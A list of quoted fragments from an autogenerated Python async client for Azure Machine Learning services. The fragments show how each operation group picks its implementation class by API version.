2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>`", "API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version: *", "\"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as", "'2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: *", "no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return", "Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>`", "version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API", "on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>`", "from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` *", "None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any", "else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client,", "..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version:", "@property def metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\"", ":mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>`", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from", "* 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations", "CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01':", "# -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from", "version {} does not have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "base_url: Service URL :type base_url: str :param profile: A profile definition, from KnownProfiles", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version))", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version", "import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return", "depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01:", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version))", "..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have", "ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type subscription_id: str :param", "'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self):", "have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance", "the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version ==", "2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version", "* 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "Generator. # Changes may cause incorrect behavior and will be lost if the", "fake class to support current implemetation of MultiApiClientMixin.\" Will be removed in final", "'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview", "v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview:", "profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default", "\"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as", "depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if", "\"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as", "import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "@property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` *", "v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION):", "= self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the", "..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations", "operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'run'\".format(api_version)) return", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version", "1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does not have", "LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview',", "ValueError(\"API version {} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations", "ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` *", "on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version", "api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass", "header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({", "import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API", "'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the", "group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on", "metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version =", "WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass", "version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from", "does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version:", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0:", "UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass", "api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k, v", "from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the", "@property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\"", "return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif", "api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as", ":mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>`", "'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status':", "else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client,", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from", "DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0',", "def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview:", "def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version:", "assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version =", "api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>`", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version", "available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>`", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from", "import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", ":class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return", ":class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations", "'2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def quotas(self):", "* 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance", "version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version == '1.5.0': from", "have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance", "..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container')", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview':", "\"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as", "ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0': from ..registry_discovery", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version))", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version ==", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise", "2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01':", "PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass", "..v2021_10_01.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` *", "import DataVersionOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "be removed in final version of multiapi azure-core based client \"\"\" pass class", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0:", "raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config,", "version {} does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "= self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else:", "api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API version", "'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does", "import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as", "* v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` *", "2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version", "..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations", "'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self,", "..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_endpoints'\".format(api_version)) return", "import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version ==", "group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on", "import RunOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {}", "def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview:", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01':", "does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif", "target subscription. :type subscription_id: str :param api_version: API version to use if no", "= self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return", "RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API", "== '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {}", "BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass", "have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance", "else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client,", "have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance", "'2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, 